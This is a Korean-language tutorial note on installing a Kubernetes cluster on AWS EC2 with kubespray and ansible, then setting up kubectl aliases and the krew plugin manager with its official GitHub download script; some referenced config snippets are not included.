중간에 인스턴스 시작

인스턴스 이름 작성

아래 OS 선택

선택 후 아래 AMI 목록을 보면 오른쪽에 "프리 티어 사용 가능"이라는 문자가 적혀있는 것들이 있다. 이것들은 무료로 사용 가능.

ID : ec2-user

1) git 설치

apt install -y git

2) clone

git clone -b v2.16.0 https://github.com/kubernetes-sigs/kubespray.git

해당 디렉토리로 이동해 apt update -y

3) 필수 패키지 설치

kubernetes는 파이썬으로 동작한다. 그래서 pip를 설치해주어야 한다.

apt install -y python3-pip

kubernetes 디렉토리 안에 requirements.txt에 k8s 실행을 위해 설치해야할 모듈 정보가 적혀있다.

cat requirements.txt

위 정보를 수정해준다.

해당 파일을 pip3 명령어의 -r 옵션 인자로 입력한다.

위 문구가 출력될 경우 --break-system-packages 옵션 추가해서 다시 입력

4) Inventory

인벤토리 sample을 mycluster라는 이름으로 복사해준다.

cp -rpf inventory/sample/ inventory/mycluster

5) 노드 등록 (마스터 & 워커)

inventory/mycluster 디렉토리에 있는 inventory.ini 파일에 노드들을 등록해준다.

• [all] : 전체 노드 등록

• [kube_control_plane] : 마스터 노드 등록

• [etcd] : 마스터 노드 등록

• [kube_node] : 워커 노드 등록

6) 파일 설정

inventory/mycluster/group_vars/k8s_cluster 밑에 k8s-cluster.yml 파일 구문 수정.

• 129라인 구문 수정

• 229라인 구문 확인

• 240라인 구문 수정

7) Kubernetes 설치

ansible-playbook -i inventory/mycluster/inventory.ini --become --become-user=root -v cluster.yml

snap install kubectl --classic

kubectl get node -o wide 이 명령어를 입력했을 때 각 노드들 정보가 출력되면 성공적으로 설치된 것이다.

8) bashrc 설정

~/.bashrc 파일에 아래 구문 작성

위 구문 아래에 추가로 alias 작성

작성 후 source ~/.bashrc 실행 한 다음 노드 정보 확인할 수 있는 kgn alias 실행

Krew 설치

1) 설치

(
  set -x; cd "$(mktemp -d)" &&
  OS="$(uname | tr '[:upper:]' '[:lower:]')" &&
  ARCH="$(uname -m | sed -e 's/x86_64/amd64/' -e 's/\(arm\)\(64\)\?.*/\1\2/' -e 's/aarch64$/arm64/')" &&
  KREW="krew-${OS}_${ARCH}" &&
  curl -fsSLO "https://github.com/kubernetes-sigs/krew/releases/latest/download/${KREW}.tar.gz" &&
  tar zxvf "${KREW}.tar.gz" &&
  ./"${KREW}" install krew
)

네트워크 안될 경우

/etc/resolv.conf 삭제 후 /run/systemd/resolve/resolv.conf 파일 ln -s 링크로 다시 심볼릭 링크 생성. 생성 후 파일 안에 원하는 DNS 서버 주소 입력.

2) 파일 설정

~/.bashrc 파일 맨 아래 구문 추가

추가 후 source ~/.bashrc

3) krew 실행

k krew 실행 시 krew 설명이 출력되면 설치 성공.